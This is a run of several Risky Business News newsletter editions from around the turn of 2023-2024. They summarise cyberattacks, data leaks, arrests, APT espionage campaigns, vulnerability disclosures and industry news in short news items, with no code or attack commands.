AlfaBank leak: Ukrainian hackers have dumped the data of 38 million customers of Alfa Bank, one of Russia's leading banks. The data was dumped by KibOrg and NLB, the groups that hacked the bank in October last year. The bank initially denied getting hacked and later tried to downplay the size of the breach.
M9 Telecom hack: A Ukrainian hacktivist group named Blackjack has breached and leaked data from Russian internet service provider M9 Telecom. The group claims it wiped more than 20 TB of the telco's data, including internal servers and the company's official website. Blackjack says the attack was only a "warm-up," and they plan to target larger telcos as revenge for Russia's attack on Kyivstar. [Additional coverage in UkrInform / English coverage in the Kyiv Independent]
General tech and privacy
Authy EOL: Twillio will discontinue its Authy 2FA authenticator app for Linux, macOS, and Windows in August this year. The company has told customers to switch to its mobile apps, which will continue to be supported.
Project Mockingbird: McAfee has unveiled Project Mockingbird, a tool to detect AI-generated audio deepfakes.
New Sentry ToS: App performance monitoring service Sentry has updated its Terms of Service to give itself the right to use its customers' data to train AI models. No opt-out option will be included.
Copilot key: Microsoft has announced plans to add a new key to its keyboards. The new button will trigger the company's Copilot AI assistant and will sit next to the Right-Alt and Space keys. This marks the first new key added to Microsoft keyboards in nearly 30 years. [Additional coverage in Sky News]
Windows hardening: Below is a calendar with Microsoft's major security and hardening dates for 2024. More details here.
OpenAI GDPR complaint: Polish privacy expert Lukasz Olejnik has filed an official GDPR complaint against OpenAI for the company's data processing practices.
Twitter becomes a problem: Verified Twitter users have pushed a wave of misinformation about the recent earthquake that hit Japan, showing how the social network has devolved from a place where you could get your breaking news to a site that will now endanger people's lives by pushing and promoting wrong information during a time of crisis. [Additional coverage in Vice]
Volkswagen integrates ChatGPT: German automaker Volkswagen announced plans to integrate the ChatGPT service into its vehicles. And now you know what car you should never buy in the next 3,401 years.
Beijing lab breaks AirDrop: The Chinese government says it detained several suspects who sent inappropriate messages using the Apple AirDrop feature. The arrests come after a local Beijing tech lab named Wangshen Dongjian developed a tool to crack the AirDrop protocol and extract a sender's phone number and email address. AirDrop was widely used in China in 2022 and 2023 to anonymously share anti-government posters and materials criticizing China's leader Xi Jinping. Apple limited access to AirDrop in November of last year at the government's request. [Additional coverage in GlobalTimes]
Government, politics, and policy
DNS4EU: Oxford professor Roxana Radu looks at DNS4EU, the EU's new DNS system designed to be used by EU agencies and member states.
IGIC report: A report [PDF] from the Office of the Inspector General of the Intelligence Community has found that over-classification, lack of guidance, and tensions with cybersecurity companies have hampered the US government's efforts to boost cyber threat intel-sharing efforts. [Additional coverage in CyberScoop]
NSA and AI: An NSA official admitted that the agency is using AI and ML technologies to detect malicious Chinese cyber activity. [Additional coverage in CyberScoop]
China to hunt down aviation-tracking devices: The Chinese government has announced a nationwide operation to identify and remove devices across China that track flights and share data with foreign entities. China's Ministry of State Security says it seized some devices and penalized individuals who installed them. Officials say the devices are a national security threat because they can also track military aircraft and not just public flights. [Additional coverage in SCMP]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Chris St Myers, Stairwell's head of threat research, about managing the risk from software you absolutely must use.
Cybercrime and threat intel
Spamdot admins identified: Infosec reporter Brian Krebs has identified the real-world identities of Salomon and Icamis, the two administrators of the now-defunct cybercrime forum Spamdot. The two admins are named Alexander Grichishkin and Andrey Skvortsov. Both are Russian nationals and have already been detained by US authorities for running a bulletproof hosting service for malware operations. Both pleaded guilty, and Grichishkin is scheduled to be released from jail in February 2024 after serving his sentence. Skvortsov has yet to be sentenced.
Ransomware dev detained in the Netherlands: Dutch Police have arrested an Amsterdam man for creating and operating the Babuk Tortilla ransomware strain. Officials identified the suspect after receiving a tip from Cisco's Talos security team. Following the arrest, police officers obtained the ransomware's decryption keys, which they shared with Avast and Cisco Talos. The keys have been integrated into the Babuk ransomware decrypter available via the NoMoreRansom portal.
Myanmar rebels take control of scam city: A coalition of Myanmar rebels has taken control of Laukkaing, a city that has been a hub for online scamming operations known as "pig butchering." The Three Brotherhood Alliance is now in control of the city and the surrounding Kokang region. The rebel groups launched their offensive in October of last year with the explicit purpose of rooting out the cybercrime cartels, which they claimed were operating under the military junta's protection. [Additional coverage in The Record]
Coinbase phisher detained: The US Secret Service has arrested a 30-year-old Indian national for his involvement in a phishing operation that targeted Coinbase users. Authorities claim Chirag Tomar was part of a group that set up fake Coinbase login pages and then lured victims to the sites after emailing and calling victims. The gang is believed to have stolen more than $20 million from at least 500 Coinbase accounts. [Additional coverage in 404 Media]
Money launderer sentenced: A US judge sentenced a Nigerian national to 10 years and one month in prison for helping cybercriminals launder money obtained via internet fraud schemes.
Water Curupira: Trend Micro has published a profile on Water Curupira, an affiliate of the Black Basta ransomware gang specializing in the distribution of the Pikabot malware via email phishing campaigns. Trend Micro says systems infected with Pikabot have been used to drop backdoors and, later, the Black Basta ransomware.
RE#TURGENCE: A financially motivated hacking group known as RE#TURGENCE is targeting MSSQL databases to deploy the Mimic ransomware. According to security firm Securonix, the group gains initial access by brute-forcing the database's admin account. The company says the group operates out of the Republic of Türkiye.
YouTube malware campaign: Fortinet is tracking a threat actor using YouTube videos promoting cracked software to distribute apps infected with the Lumma infostealer.
KEV update: CISA has updated its KEV database with six new vulnerabilities currently actively exploited in the wild. The list includes zero-days in ColdFusion, Apple, Apache Superset, Joomla, and D-Link systems.
Q4 2023 DDoS trends: Internet infrastructure company Cloudflare says it saw a massive 61,839% surge in DDoS traffic that targeted environmental protection websites during the 28th United Nations Climate Change Conference (COP 28).
Malware technical reports
None in this edition.
Sponsor Section
Stairwell's Mike Wiacek demonstrates Stairwell's file analysis and threat detection platform to Risky Business host Patrick Gray. Stairwell helps you monitor and analyze every executable file in your organization, automatically collecting crucial intelligence and providing your security team with in-depth visibility and detections.
APTs, cyber-espionage, and info-ops
UAC-0184: CERT-UA has published IOCs and details about a spear-phishing campaign conducted by a group the agency is tracking as UAC-0184. The campaign was initially spotted by Trend Micro and its final payload is the Remcos RAT and the ReverseSSH shell.
Stuxnet saboteur: Dutch journalists have revealed the name of the person who helped the US and Israel deploy the Stuxnet computer virus inside Iran's nuclear program in 2008. Reporters say that a Dutch engineer named Erik van Sabben installed water pumps that contained the Stuxnet inside Iran's uranium enrichment facility at Natanz in 2008. Van Sabben was allegedly recruited by the Dutch AIVD intelligence service, although Dutch officials say they didn't know they were deploying a computer virus. Van Sabben died in a motorbike accident two weeks later near his home in Dubai, and Stuxnet exploded into a global malware epidemic two years later in 2010. [Additional coverage in De Volkskrant / English coverage in NLTimes / 2019 article on the topic]
Vulnerabilities, security research, and bug bounty
Zengo hacking challenge: Crypto-wallet maker Zengo launched a hacking challenge, inviting anyone to hack one of its demo wallets and keep the 10 Bitcoin (~$420,000) stored inside.
Lantronix vulnerabilities: Pentagrid researchers have identified several vulnerabilities in Lantronix EDS-MD IoT gateway devices. Fixes are scheduled to go live on January 12, 2024.
OFBiz exploitation: Prio-n researchers analyze two recent Apache OFBiz vulnerabilities, including one that is under active exploitation.
Bosch Rexroth vulnerabilities: Nozomi researchers have found 23 vulnerabilities in Bosch Rexroth nut-runners, pneumatic torque wrenches used in automotive industry production lines.
Control-M vulnerabilities: Security engineer Guillaume Quéré has found four vulnerabilities that can be chained to take control of the web console of BMC's Control-M, an application workflow orchestration solution.
CS:GO attack surface: Synacktiv researchers have published research looking at the attack surface of Counter-Strike: Global Offensive (CS:GO), one of the internet's most popular games over the past decade. The research was published after Valve launched CounterStrike 2.0 last fall. The found bugs were never fixed, which is a very bad look for Valve.
"Overall code is legacy and does not implement in-depth security protections. [...] Reporting the bug to Valve through HackerOne managed program was a long process, as shown in the timeline available below. The ticket was closed with the release of Counter-Strike 2 and the impacted code is no longer present. In fact, to our knowledge, no patch was released in the meantime, despite multiple follow-ups."
KyberSlash attack: Security researcher Daniel J. Bernstein has published details on KyberSlash, a security flaw in libraries that support Kyber, a quantum-resistant key encapsulation mechanism. Many libraries have yet to be patched.
ZDI stats: Trend Micro says its Zero-Day Initiative (ZDI) private bug bounty program has helped security researchers file and report 1,913 bugs throughout 2023. The company says that "nearly 3 of 4 [of all reported vulnerabilities] were rated Critical/High risk."
Acquisition news: Private equity firm the MC² Security Fund has acquired cybersecurity firm Trustwave from Singtel for $205 million.
New tool—YARA Toolkit: Microsoft security researcher Thomas Roccia has releasedYARA Toolkit, a web app for writing YARA rules.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk with infosec and anti-virus veteran Martijn Grooten about how the infosec industry has changed over the years.
This newsletter is brought to you by Stairwell. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Hackers associated with the Turkish government are conducting new cyber-espionage operations across Europe and the Middle East, according to recent reports from PwC, StrikeReady, and Hunt & Hackett.
Tracked as Sea Turtle (Teal Kurma, Silicon, UNC1326, Cosmic Wolf), the group rose to fame between 2018 and 2020 when it conducted a series of DNS hijackingcampaigns that intercepted traffic for Cypriot, Greek, and Iraqi government systems.
Ever since its public ousting in late 2020, the group wound down its DNS hijacking infrastructure, and very little activity has been linked to its operations.
In recent reports, the three security firms claim the group has now re-tooled and changed its modus operandi, although some connections to its old infrastructure remained.
Sea Turtle has now been linked to the SnappyTCP backdoor, a simplistic reverse shell designed for Linux and Unix systems, which the group has been using in recent operations.
These new attacks targeted governments, telecommunication, and IT service providers. All three reports conclude the attacks were classic cyber-espionage operations—aimed at collecting information that can further Turkey's economic or political interests.
On top of that, Sea Turtle has also been seen running websites mimicking the sites of Turkish news outlets and bloggers, Kurdish news sites, and NGOs and TV channels in the Arab world.
Aside from victims in the Netherlands, none of the three reports mention the exact location of the group's recent operations.
According to Hunt & Hackett, initial access occurred via compromised cPanel accounts, from where the group pivoted to the victim's other infrastructure via SSH.
The group then planted the SnappyTCP backdoor for future access, which they leveraged to collect data from victim environments, such as email archives.
The StrikeReady report also mentions a cluster of Windows malware artifacts with a "software update" theme.
The three reports highlight a noticeable shift in the group's operations, moving away from DNS hijacking to a classic compromise-and-collect approach. Hunt & Hackett specifically warns telcos, ISPs, and managed service providers to secure their infrastructure, as the group has been seen going after similar organizations in attempts to pivot to accounts operated by their primary targets.
Breaches, hacks, and security incidents
Russia hacked UA webcams: Russian hackers have hijacked at least two security cameras and used their live video feeds to adjust missile strikes targeting the city of Kyiv at the start of the year. Ukraine's Security Service SBU says it detected the hacks and took down the cameras in order to prevent further abuse. The agency says that since the start of Russia's invasion, it has taken down more than 10,000 security cameras across Ukraine.
Kyivstar cyberattack: Russian hackers breached and stayed hidden inside the network of Ukrainian telco Kyivstar network for at least seven months. The hackers breached the telco in May before being discovered and ousted in early December of 2023. According to Illia Vitiuk, the head of Ukraine's SBU intelligence agency, the hack was carried out by Sandworm, a hacking unit inside Russia's military intelligence agency GRU. The group allegedly wiped thousands of the telco's internal systems. Vitiuk says the hack had a significant impact on the civilian population but no impact on military operations. [Additional coverage in Reuters]
Gallery Systems cyberattack: Several US museums are unable to display their art collections online after hackers hit Gallery Systems, a shared provider of IT infrastructure. [Additional coverage in ARTNews]
Xerox hack: Xerox has confirmed that hackers breached its US subsidiary as part of a ransomware attack.
Orange Spain incident: Mobile operator Orange Spain has had its entire internet traffic sent into a black hole after an unidentified individual logged into the company's RIPE account and changed BGP routes randomly. Fun, fun, fun!
23andMe drama: 23andMe is trying to blame its users for its recent data breach by claiming they are at fault for using weak passwords. The new drama comes after the company was sued more than 30 times for a recent security breach and after the company sneakily modified its terms of service to force people into arbitration. [Additional coverage in TechCrunch]
Beirut airport hack: A hacktivist group defaced the public screens at the Beirut international airport in Lebanon with anti-Iran and anti-Hezbollah messages. A group calling itself "Lord and the People" took credit for the incident. [Additional coverage in ArabNews]
CoinsPaid hacked again: Estonian cryptocurrency platform CoinsPaid fell victim to a cyberattack and lost an estimated $7.5 million worth of crypto assets. This is the company's second hack after it lost $37.3 million in July 2023. CoinsPaid blamed last year's incident on North Korean hackers. [Additional coverage in CryptoNews]
Gamma crypto-heist: The Gamma cryptocurrency platform says it lost $6.1 million worth of assets after a threat actor abused the infrastructure of one of its providers and manipulated exchange prices.
Radiant Capital cyber-heist: A threat actor has stolen almost $4.5 million worth of crypto-assets from crypto-platform Radiant Capital. The incident is suspected to have been a flash loan attack. [Additional coverage in Coinpedia]
Mandiant Twitter scam: A threat actor hijacked the Twitter account of Google's Mandiant division and promoted a cryptocurrency scam. It was one of many incidents that hit high-profile Twitter gold badge accounts over the past week. The hacks appear to be linked to a new underground market where hacked Twitter business accounts are being offered for sale. [Additional coverage in ArsTechnica]
General tech and privacy
Merck settles NotPetya lawsuit: American pharmaceutical company Merck has settled a lawsuit with three insurers in relation to the NotPetya cyberattacks. The parties settled the lawsuit a day before oral arguments were meant to be heard in front of the New Jersey Supreme Court. The company sought $1.4 billion in damages from its insurers following the 2017 NotPetya cyberattack. A New Jersey appeals court ruled the company was entitled to $700 million in claims before the insurers moved the case to the state's Supreme Court. The terms of the settlement have not been disclosed. [Additional coverage in Insurance Journal and Bloomberg]
Facebook creepy tracking: Meta has enabled a new feature named Link History for all Facebook users that will keep track of their visited links and use the data to show ads. The feature was forcibly enabled by default for all users, and you can only disable it through an option hidden deep in the app's settings. [Additional coverage in SearchEngineLand]
LastPass master password changes: Password management service LastPass is forcing customers to choose stronger and longer 12-character-long master passwords. The company is enforcing the new rule more than a year after it suffered a security breach in November 2022. In September 2023, security experts found that hackers cracked some of the weaker master passwords and stole more than $35 million worth of cryptocurrency from LastPass customers.
AWS security best practices: The AWS team has published a guide covering best practices for configuring AWS security services. This is a guide for how to configure AWS security tools, not how to secure AWS infrastructure.
Windows market share: Windows 10 has remained around the 67% figure last year, while Windows 11 has grown from 16% to 26%, according to StatCounter.
Government, politics, and policy
More FBI cyber agents abroad: The FBI has increased the number of cyber assistant legal attachés deployed at embassies across the globe. New legal attachés positions have been established in New Delhi, Rome, and Brasilia. The FBI began deploying cyber legal attachés in 2011 and is currently employing 63 cyber legal attachés in Australia, the Netherlands, Estonia, Romania, Ukraine, and Canada. The agents' main role is to work with local law enforcement to investigate and disrupt cybercrime operations. [Additional coverage in CyberScoop]
New CNMF chief: Marine Corps Maj. Gen. Lorna Mahlock has assumed the leadership of the Cyber National Mission Force, a cyber investigations unit inside US Cyber Command. Maj. Gen. Mahlock replaces Army Maj. Gen. William Hartman, who was named Cyber Command's new deputy chief. [Additional coverage in The Record]
Greece to set up cybersecurity agency: The Greek government has published a draft law that will establish a National Cybersecurity Authority, a new agency aimed at bolstering the country's cyber defenses. [Additional coverage in BalkanInsight]
Sponsor section
In this Risky Business News sponsor interview Tom Uren talks to Chris St Myers, Stairwell’s head of threat research, about managing the risk from software you absolutely must use.
Cybercrime and threat intel
Pompompurin breaks parole: The FBI has re-arrested a hacker known as Pompompurin after the 21-year-old broke his parole conditions. Officials say Conor Brian Fitzpatrick connected to the internet via a VPN from a computer without monitoring software installed. The 21-year-old was initially arrested in March 2023 for running BreachForums, a cybercrime forum where hacked data was leaked and traded. Fitzpatrick pleaded guilty to hacking and child pornography charges and was released on parole in July last year. His sentencing is scheduled for January 19, later this month. [Additional coverage in The Record]
xDedic fallout: The US Justice Department says that five years after shutting down the xDedic cybercrime marketplace, it has now identified and charged 19 individuals active on the site. Officials say they have now identified and handed down sentences to the site's main operators, two individuals from Moldova and Ukraine. Sentences have also been handed down to xDedic sellers and buyers, individuals who sold and bought hacked servers off the site. Many of these individuals were also charged with other crimes related to the exploitation of xDedic's inventory, with some sentences reaching 78 months in prison.
BEC scammer detained: US officials have indicted a Nigerian national on charges of allegedly stealing more than $7.5 million through BEC scams. Olusegun Samson Adejorin was arrested in Ghana on December 29 and is awaiting his extradition to the US. Two of Adejorin's victims are charitable organizations.
Follow-on extortion campaigns: Security firm ArcticWolf reports that multiple victims that got hit by the Akira and Royal ransomware groups last year have been contacted by other criminal groups with new extortion threats. These second groups attempted to extort victims with threats to publish their older stolen data or they offered to hack into the first ransomware gang's servers and delete the stolen data for a fee. These groups used names like the Ethical Side Group (ESG) or xanonymoux.
OpJapan: South Korean security firm S2W Talon has published a report looking at a hacktivism campaign tracked as #OpJapan, where various hacktivist groups targeted Japanese organizations after the country released treated water from the Fukushima nuclear plant back into the ocean.
New npm malware: Twenty-four malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
PyPI malware: Fortinet researchers have spotted three malicious Python libraries on the official PyPI portal that were designed to deploy cryptocurrency miners on Linux systems.
Terrapin exposure: More than 11 million internet-connected devices are vulnerable to a new SSH attack known as Terrapin (CVE-2023-48795). According to a scan performed by the Shadowserver Foundation, nearly half of all systems with an exposed SSH port over IPv4 are vulnerable.
2023 crypto-hacks: Hackers have stolen more than $1.8 billion worth of crypto assets across 751 security incidents in 2023. The number is 51% down from the $3.7 billion lost a year before, in 2022. According to blockchain security firm CertiK, the top 10 most costly incidents accounted for more than $1.1 billion lost last year. The most costly incidents were linked to leaks or compromises of private keys, with more than $880 million stolen this way last year. Fairyproof has the 2023 crypto-heist stats at $1.23 billion across 489 incidents. According to TRM Labs, North Korean hackers were linked to $600 million stolen assets.
Malware technical reports
Mirai.TBOT: QiAnXin researchers have discovered a new Mirai-based botnet. Named Mirai.TBOT, the botnet has been active since August, infected more than 30,000 systems, and is mainly used for DDoS attacks. This is the same botnet that Akamai tracks as InfectedSlurs.
SilverRAT: CyFirma has published a report on SilverRAT, a new remote access trojan that launched in November of last year. According to researchers, the malware was created by a Syrian national going by the name of "Anonymous Arabic," who previously also created the S500 RAT. SilverRAT has a new feature meant to destroy system restore points, a feature that's unique among RATs sold online.
AsyncRAT: AlienLabs looks at some recent AsyncRAT samples the company has spotted in the wild over the past 11 months.
LockBit: Chinese security firm Xitan has published a report on the LockBit ransomware.
Anti-analysis techniques: Palo Alto Networks looks at the recent anti-analysis techniques used by malware strains such as GuLoader and RedLine Stealer.
Sponsor Section
Stairwell's Mike Wiacek demonstrates Stairwell's file analysis and threat detection platform to Risky Business host Patrick Gray. Stairwell helps you monitor and analyze every executable file in your organization, automatically collecting crucial intelligence and providing your security team with in-depth visibility and detections.
APTs, cyber-espionage, and info-ops
Hafnium's persistence method: Researchers at Purple Team have looked at how Hafnium is modifying scheduled tasks on infected hosts to maintain persistence.
Bluenoroff's SpectralBlur: macOS malware researcher Patrick Wardle has published an analysis of SpectralBlur, a macOS backdoor linked to DPRK's Bluenoroff's cyber-espionage group.
UAC-0050:Uptycs looks at recent UAC-0050 spear-phishing campaigns pushing the RemcosRAT, also seen by Ukraine's CERT team.
SideWinder: Bridewell has published a report with details on new SideWinder infrastructure. SideWinder APT, also known as Rattlesnake, is one of the oldest nation-state threat actors that is believed to originate from India.
No-Justice wiper: ClearSky has published a technical breakdown of No-Justice, the data wiper used by Iranian hacking group Homeland Justice in a recent attack targeting the Albanian Parliament and other local companies. The attack took place on December 24 last year. Homeland Justice is the same group that hacked and crippled the Albanian government in the summer of 2022.
Vulnerabilities, security research, and bug bounty
OFBiz exploitation: Threat actors are exploiting a recently disclosed vulnerability in OFBiz, an ERP solution from the Apache Foundation. The attacks began a week after SonicWall security researchers disclosed the bug in a blog post and after Apache patched the issue. Tracked as CVE-2023-51467, the vulnerability is an authentication bypass that can lead to SSRF and RCE attacks. Some parts of the OFBiz project are used in Atlassian products, but the company said its software is not affected.
Bitwarden vulnerability: Password management application Bitwarden has fixed a major vulnerability that could have allowed threat actors to remotely steal a user's password vault without knowing the password or requiring biometric authentication.
Ivanti EPM security update: Ivanti (formerly MobileIron) has published a security update for its Endpoint Manager (EPM) server. Tracked as CVE-2023-39336, this is an SQL injection vulnerability rated as critical (9.6/10).
QNAP security updates: Taiwanese company QNAP has released security updates to fix 12 vulnerabilities across several products.
OpenOffice security updates: The Apache Foundation has released a security update for the OpenOffice software suite that fixes four vulnerabilities.
PHP library vulnerability: CERT-PL has found a vulnerability (CVE-2023-6551) in a popular PHP library used to handle image uploads.
2023 vulnerabilities: Cisco's Jerry Gamblin has published a statistical overview of 2023's CVEs. In total, there were 28,902 published CVEs, up 15% from 2022. Thirty-six CVEs scored a "perfect" 10.0. Less than 1% were routinely exploited in the wild, according to the Qualys 2023 Threat Landscape report.
Infosec industry
Acquisition news #1: Airbus is in talks to buy Atos, a prominent EU cybersecurity company.
Acquisition news #2: SentinelOne announced its intention to acquire cloud-native application protection platform PingSafe.
Acquisition news #3: SonicWall has acquired Banyan Security, a provider of security solutions for edge networking devices.
Acquisition news #4: Mimecast has acquired Elevate Security, an email security company specializing in human behaviors and risk.
New tool—SSH-Snake: Security researcher Joshua Rogers has open-sourced SSH-Snake, a tool designed to perform automatic network traversal using SSH private keys discovered on systems. Rogers says the tool's main objective is to create a comprehensive map of a network and its dependencies to identify the extent to which a network can be compromised using SSH and SSH private keys starting from a particular system.
New tool—Galah: Niantic Labs security engineer Adel Ka has released Galah, a web honeypot tool powered by OpenAI.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.
You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The RiskyBiz crew behind our newsletters and podcasts is on hiatus between December 8 and January 8 for the winter holidays, but we put out this weekly edition with some of the past week's biggest infosec stories.
Happy holidays!
Breaches, hacks, and security incidents
Albanian cyberattacks: Albania's cybersecurity agency (AKCESK) says that major cyberattacks have targeted the networks of the country's parliament and its largest telco, Albania ONE. The attacks took place on December 25. The agency did not make a formal attribution.
SnappFood leak: An Iranian hacking group named IR Leaks has leaked the data of more than 20 million users of SnappFood, Iran's largest food delivery app. The same group also dumped databases from several other Iranian companies. [Additional coverage in Iran International]
Evotor cyberattack: The IT Army of Ukraine has taken credit for a cyberattack that crippled the operations of Evotor, a Russian company that makes and operates online cash registers used across Russia.
BELTA attack: Belarusian hacktivist group the Cyber Partisans have hacked and wiped the network of the Belarusian Telegraph Agency (BELTA), the country's state-owned news agency.
EPS ransomware attack: Serbian public energy company EPS and the Serbian government are staying silent about a ransomware attack that hit the organization around the Christmas holiday. [Additional coverage in BalkanInsight]
EasyPark cyberattack: EasyPark, the largest parking app operator in Europe, has disclosed a security breach.
Ohio Lottery cyberattack: The Ohio Lottery has suffered a cybersecurity attack, which is preventing some winners from claiming their prizes. [Additional coverage in WCPO]
Downfall incident: A developer for Downfall, a game mod for the Slay the Spire indie game, had his account hacked, allowing hackers to insert malware in the Steam mod. The incident took place on Christmas and deployed an infostealer to user systems.
Telcoin cyber-heist: A threat actor stole $1.2 million worth of tokens from the Telcoin project. [Additional coverage in CoinDesk]
Levana cyber-heist: Hackers stole $1.1 million worth of assets from the Levana Protocol. [Additional coverage in Rekt News]
Orbit Bridge cyber-heist: On the last day of 2023, a hacker stole almost $82 million worth of crypto-assets from cross-chain exchange Orbit Bridge. Happy New Year!!!
General tech and privacy
Microsoft disables ms-appinstaller protocol: Microsoft has disabled the ms-appinstaller protocol in Windows by default after several threat actors began abusing it to install malware on user devices throughout November 2023. The company says that groups like Storm-0569, Storm-1113, Storm-1674, and Sangria Tempest have been spotted abusing the protocol.
Google settles lawsuit: Google has settled the $5 billion lawsuit in which it was accused of tracking users even when they were in Chrome's private mode. The terms of the settlement were not disclosed, but they will most likely become public when the settlement is presented to the court for approval. [Additional coverage in the BBC]
Google Groups ends Usenet support: Google is ending support for its Usenet integration on Google Groups on February 22, 2024. The company says it took the decision to combat spam.
Steam drops old Windows versions: With the new year, Steam has dropped support for Windows 7 and Windows 8, citing security reasons.
Cars and the 4th Amendment: Car data is apparently not safeguarded by 4th Amendment protections, meaning cops can access it without a warrant. This is possible thanks to a loophole/exception in US law since the Prohibition era. [Additional coverage in The Record]
XCast settlement: The US DOJ and FTC have settled with XCast Labs, a company that provided infrastructure for spammy telemarketers. Under the proposed court order, XCast Labs will be required to implement a screening process and end its relationships with firms that are not complying with telemarketing-related laws.
Keybase outage: Encrypted instant messaging service Keybase has had a major outage after one of its certificates expired after 10 years and nobody noticed in time. Since the start of the year, the vendor has been shipping software updates to rotate the certificate across its apps.
WiFi 7: The WiFi 7 standard is expected to arrive later this year in 2024. IEEE Spectrum has a breakdown of all the new changes. The main new feature is multi-link (MLO) support.
Apple-Corellium legal battle: Apple and cybersecurity company Corellium have settled their four-year-old legal battle. The terms of the settlement were not disclosed. Apple sued Corellium in 2019 over its iOS sandboxing technology. [Additional coverage in Forbes]
Mozilla outrage: Lots of Firefox and privacy supporters are mad because even if Firefox lost a giant chunk of browser share this year, the Mozilla CEO netted a giant $7 million salary last year.
Let's Encrypt stats: In its end-of-year report, Let's Encrypt says its certificates are now used on more than 360 million websites, up 40 million from last year.
Government, politics, and policy
South Korea sanctions North Korean spy chief: Seoul authorities have
sanctioned eight North Korean officials for their role in the country's intercontinental ballistic missile program. Among the sanctioned individuals is Ri Chang Ho, the head of the country's intelligence agency. South Korean officials say Ri has helped fund the program through the RGB's illicit cyber operations. [Additional coverage in The Straits Times]
Moldova sets up cybersecurity agency: With help from Estonian officials, Moldova has set up a national cybersecurity agency.
Risky Business Podcasts
In this podcast, Patrick Grey and Tom Uren talk about whether election interference will take place in the Taiwanese, US, and Russian elections that are all taking place in 2024. They also look at a ChatGPT-powered online harassment campaign.
Cybercrime and threat intel
Ransomware gang arrest: Chinese police detained two individuals from Hohhot who were involved in ransomware attacks against Chinese organizations. Officials say the group used ChatGPT to optimize the code of their ransomware, which they used to encrypt corporate servers and demand $20,000 in ransom. [Additional coverage in Global Times]
Orgon sentencing: A Colombian judge has sentenced Andres Felipe Cardoso Alvarez to three years and five months in prison. Alvarez was known as Orgon, a member of the Anonymous Colombia hacking group. As part of the group, he launched attacks against a large number of government organizations.
Cyber Toufan wiping spree: The data-wiping spree started by the Cyber Toufan group at the end of November is still going strong. The group has now wiped more than 100 organizations, with the vast majority being based in Israel. Around 40% of the victims were hit after the group compromised their MSP.
Iranian phishing/wiping campaign: Israel's CERT team says Iranian hackers have continued their phishing campaign where they pose as F5 and lure victims into running a data wiper on their equipment. The campaign has now been running for more than a month.
Spyware in India: Amnesty International has confirmed that the Pegasus spyware was used in attacks against Indian journalists. The confirmation comes after Apple notified victims about the attack at the start of December 2023 but did not say what kind of malware was used. Amnesty says the Pegasus spyware was deployed on infected devices between August and October 2023. In the meantime, WaPo reports that Indian government officials have pressured Apple to change the tone of its warnings in a way that doesn't incriminate them.
New ransomware strain: Symantec researchers have spotted a new ransomware strain named TISAK in the wild.
Crypto drainers in 2023: Crypto-draining phishing kits have been used to steal more than $300 million worth of crypto assets from more than 320,000 victims throughout last year.
Redline dominates 2023: The top most analyzed malware on the ANY.RUN platform in 2023 was the Redline infostealer, the same as last year.
Mac malware of 2023: Pattrick Wardle has published a review of last year's most common macOS malware strains.
Malware technical reports
Marble Framework: In an interesting experiment, malware analysts from HackerHouse have used AI/ML tools to reconstruct the (incomplete) source code of the Marble Framework, a malware toolkit initially shared in the CIA Vault7 leaks.
Rhysida ransomware: Logpoint researchers have published a technical report on the Rhysida ransomware, a RaaS that began operations in May 2023.
8base ransomware: Fortinet looks at the rencent activity of the 8base ransomware gang.
Black Basta decrypter: Tobias Mueller of SRLabs has developed a free decrypter for the Black Basta ransomware. The decrypter was released at the 37C3 conference last week. It allows victims to recover files locked by the group between November 2022 and December 2023. The Black Basta gang has fixed the bug exploited by the decrypter.
MetaStealer: eSentire researcher RussianPanda has published part two of an analysis of MetaStealer. Part one is here. The infostealer launched in March 2022 and incorporates code from Redline Stealer, as its creator candidly admitted back then. The malware is different from the MetaStealer that SentinelOne discovered last year, which is written in Go and targets macOS exclusively.
Pure Logs Stealer: The same researcher also has an analysis of Pure Logs Stealer, a more recent infostealer, which RussianPanda claims it "fails to impress."
Sponsor Section
In this product demo, GreyNoise founder and CEO Andrew Norris demonstrates how people use the GreyNoise sensor network.
APTs, cyber-espionage, and info-ops
Kimsuky: AhnLab has published an analysis of recent Kimsuky operations that employed the group's macOS malware AppleSeed.
Kremlin spams overseas Ukrainians: Ukraine's GUR intelligence service says Ukrainians living abroad have received a wave of spam messages urging them to help Russia expel "American Satanists" from Ukraine's "primarily Russian land." The incident comes as Ukrainian officials warned that the Kremlin is preparing new disinformation efforts across the EU, something French officials also warned about.
APT28: Ukraine's CERT team has spotted Russia's APT28 hacking group launching new spear-phishing operations against Ukrainian targets between December 15 and 25. The final payload was malware strains such as MASEPIE, OCEANMAP, and STEELHOOK.
Operation Triangulation: Kaspersky researchers say they found evidence that the Operation Triangulation spyware attacks abused a secret hardware feature in iOS devices to bypass hardware-based security protections (CVE-2023-38606). The operation targeted Russian government officials, foreign diplomats working in Russia, and Kaspersky employees. Russia's FSB intelligence service linked the attack to the NSA and claimed Apple cooperated with the American spy agency.
Vulnerabilities, security research, and bug bounty
New Google exploit: Several malware developers have found a new exploit that allows them to revive expired Google cookies and access accounts even after users change their passwords. The new technique has been used in the wild since October, according to Hudson Rock, CloudSEK, and independent threat intel analysts. Infostealers seen using it include LummaStealer, Rhadamanthys, Risepro, Meduza, and Stealc Stealer. The exploit allegedly resides in an undocumented Google Oauth endpoint named MultiLogin.
Juniper security updates: Juniper has released a security update to patch 18 vulnerabilities in its JSA (Juniper Secure Analytics) series.
D-Link unpatched vulnerabilities: Tenable has found a vulnerability in the D-Link D-View network management utility that can be used to leak device passwords. The issue is still unpatched.
Spreadsheet::ParseExcel patches: A security update has been released for Spreadsheet::ParseExcel, the Perl module that got exploited as part of the recent attacks on Barracuda ESG appliances. Apparently, an exploit for this Perl module has been available in the wild for months.
Apache OfBiz auth bypass: Sonicwall researchers have found an authentication bypass in Apache OfBiz servers (CVE-2023-51467).
GKE Fluent Bit vulnerability: Palo Alto Networks has published a write-up on an EoP vulnerability they found in the Fluent Bit logging agent of the Google Kubernetes Engine, patched earlier in December.
PandoraFMS vulnerabilities: NCC Group has found 18 vulnerabilities in PandoraFMS, an enterprise-scale network monitoring and management application.
